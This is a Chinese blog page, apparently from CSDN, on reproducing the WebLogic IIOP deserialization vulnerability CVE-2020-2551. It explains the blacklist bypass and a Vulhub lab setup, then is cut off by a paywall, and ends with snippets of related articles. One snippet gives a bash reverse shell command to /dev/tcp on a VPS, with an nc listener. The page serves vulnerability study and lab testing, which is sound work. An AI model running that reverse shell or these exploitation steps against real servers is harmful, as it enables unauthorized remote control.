Weblogic IIOP反序列化漏洞(CVE-2020-2551) 漏洞复现

最新推荐文章于 2024-10-16 20:46:36 发布
原创 最新推荐文章于 2024-10-16 20:46:36 发布 · 1.5k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #网络安全 #安全性测试

本文介绍了Oracle WebLogic Server的高危漏洞CVE-2020-2551,该漏洞允许攻击者通过IIOP协议执行远程代码。分析表明,由于过滤机制的缺陷,JtaTransactionManager类可以被反序列化,导致JNDI注入。复现过程中,通过Vulhub的CVE-2017-10271环境搭建漏洞靶机,并使用python脚本检测漏洞存在。接着,创建恶意exp.java文件,编译成class,通过marshalsec启动RMI服务,最终成功利用漏洞弹出shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

2020年1月15日,Oracle发布了一系列的安全补丁,其中Oracle WebLogic Server产品有高危漏洞,漏洞编号CVE-2020-2551,CVSS评分9.8分,漏洞利用难度低,可基于IIOP协议执行远程代码。

经过分析这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。

环境搭建

直接使用vulhub中的CVE-2017-10271就可以

使用git克隆到本地

git clone https://github.com/vulhub/vulhub.git

进入对应环境

cd vulhub/weblogic/CVE-2017-10271
最低0.47元/天 解锁文章

200万优质内容无限畅学
助安社区
关注
Weblogic CVE-2020-2551复现
迷风小白
06-02 1万+
0x00 前言 Weblogic IIOP 反序列化 0x01 漏洞环境 所有环境都是建立在java环境的基础上,jdk自行下载安装,本机环境jdk 1.8 环境1:vulub-weblogic-CVE-2017-10271 环境2:本地搭建Windows weblogic下载 weblogic 10.3.6安装步骤 搭建完成以后,启动weblogic访问如下图所示即为搭建成功 0x02 漏洞利用 这里我们采用环境2在本地搭建 win7:192.168.111.18(虚拟机) win10:192.168
Weblogic IIOP协议反序列化CVE-2020-2551漏洞复现
Boom!脑洞大爆炸的博客
11-11 2573
Weblogic IIOP协议反序列化CVE-2020-2551复现
weblogic 反序列化CVE-2020-2551漏洞复现(vulfocus)
qq_40646572的博客
04-27 3425
weblogic 反序列化CVE-2020-2551漏洞是基于IIOP协议执行远程代码进行利用。
Weblogic IIOP反序列化漏洞CVE-2020-2551
chaojixiaojingang
01-08 2345
1.漏洞描述 Weblogic IIOP反序列化漏洞影响的协议为IIOP协议,该漏洞是由于调用远程对象的实现存在缺陷,导致序列化对象可以任意构造,在使用之前未经安全检查,攻击者可以通过 IIOP 协议远程访问 Weblogic Server 服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。 2.影响版本 10.3.6.0.0 12.1.3.0.0 12.2.1.3.0 12.2.1.4.0 3.漏洞环境搭建 所有环境都是建立在java环境...
Weblogic CVE-2020-2551 IIOP反序列化漏洞复现
玄道的网安博客
03-06 1481
漏洞概述 攻击者可以通过IIOP协议远程访问Weblogic Server服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。 IIOP协议以Java接口的形式对远程对象进行访问,默认启用。 影响版本 weblogic 10.3.6 weblogic 12.1.3.0 weblogic 12.2.1.3.0 weblogic 12.2.1.4.0 环境搭建 下载地址 https://www.oracle.com/m...
Weblogic RMI-IIOP(cve-2020-2551)复现
hibari_18的博客
04-29 1645
0x01 复现 RMI方式: 1.vps 生成exp.class(示例为windows弹计算器,如果想反弹linux shell 把命令改成bash -i >& /dev/tcp/vps/4444 0>&1,然后vps用nc -lvvp 4444 监听本地端口即可,用java1.6版本编译成功率高) javac -source 1.6 -target 1.6 exp...
Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)
最新发布
qq_62987084的博客
10-16 1300
带你了解 Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
07-28
关于Weblogic IIOP反序列化漏洞CVE-2020-2551),以下是一些相关信息: CVE-2020-2551Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java反序列化漏洞...
WebLogic 反序列化漏洞(CVE-2019-2890)复现(超详细)
热门推荐
渗透之路,攻防之间皆学问
03-16 1万+
目录 一. 漏洞介绍 二. 影响范围 三. 漏洞环境搭建 四. 漏洞复现 五. 漏洞修复 六. 漏洞检测poc 很多漏洞复现文章都不够详细,就是你按照他写的去复现会出很多很多的问题。我综合了几篇文章,写下这最详细的复现步骤。希望能帮助大家少走弯路 一. 漏洞介绍 2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号为CVE-2019-2890。 Weblogi...
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
网络空间安全学习
09-19 1万+
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
CVE-2020-2551.zip
08-28
CVE-2020-2551复现
WebLogic 反序列化漏洞(CVE-2019-2890)
午夜安全
10-20 3460
WebLogic 反序列化漏洞(CVE-2019-2890) 漏洞描述 2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号为CVE-2019-2890。 Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic反序列化黑名单,使攻击者可以...
Weblogic IIOP反序列化漏洞CVE-2020-2551漏洞分析
whatday的专栏
07-09 5797
0x00 前言 2020年1月15日, Oracle官方发布了CVE-2020-2551漏洞通告,漏洞等级为高危,CVVS评分为9.8分,漏洞利用难度低。影响范围为10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0。 0x01 漏洞分析 从Oracle 官方的CPU公告中可以看出该漏洞存在于weblogic核心组件,影响的协议为IIOP。其实经过分析发现,该漏洞原理上类似于RMI反序列化漏洞CVE-2017-3241),和之前的T3协议所引发的一系列.
Weblogic CVE-2020-2551 IIOP反序列化漏洞复现
qq_30302577的博客
04-01 7926
文章目录前言0x01 漏洞说明0x02 影响版本:0x03 Weblogic环境搭建0x04 漏洞利用0x05 漏洞修复方案1.使用 Oracle 官方安全补丁进行更新修复2.如果不依赖T3协议进行JVM通信,用户可通过控制T3协议的访问来临时阻断针对该漏洞的攻击。0x06 参考链接 前言 本教程及工具仅供技术学习交流、请勿用于非法行为、否则后果自负 0x01 漏洞说明 2020年1月15日,O...
web反序列化漏洞原理/Weblogic IIOP反序列化漏洞CVE-2020-2551漏洞分析_新手白客教学
程序员六七的博客
07-15 1368
安全- 安全资讯平台
CVE-2023-21839:Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 5192
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
weblogic 反序列化CVE-2020-2883)漏洞复现
weixin_42675091的博客
09-03 1344
weblogic 反序列化CVE-2020-2883)漏洞复现
漫谈-Weblogic-CVE-2020-2551
Ms08067安全实验室
05-01 5253
背景 2020 年 1月14日,Oracle 发布了大量安全补丁,修复了 43 个严重漏洞,CVSS 评分均在在9.1以上。其中 CVE-2020-2551 漏洞,互联网中公布...
CVE-2020-2551漏洞
kang_12358的博客
08-28 4040
2020 年 1月14日,Oracle 发布了大量安全补丁,修复了 43 个严重漏洞,CVSS 评分均在在9.1以上。 其中 CVE-2020-2551 漏洞,互联网中公布了几篇针对该漏洞的分析文章以及POC,但公布的 POC 有部分不足之处,导致漏洞检测效率变低,不足之处主要体现在: 公布的 POC 代码只针对直连(内网)网络有效,Docker、NAT 网络全部无效。 公布的 POC 代码只支持单独一个版本,无法适应多个 weblogic 版本
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值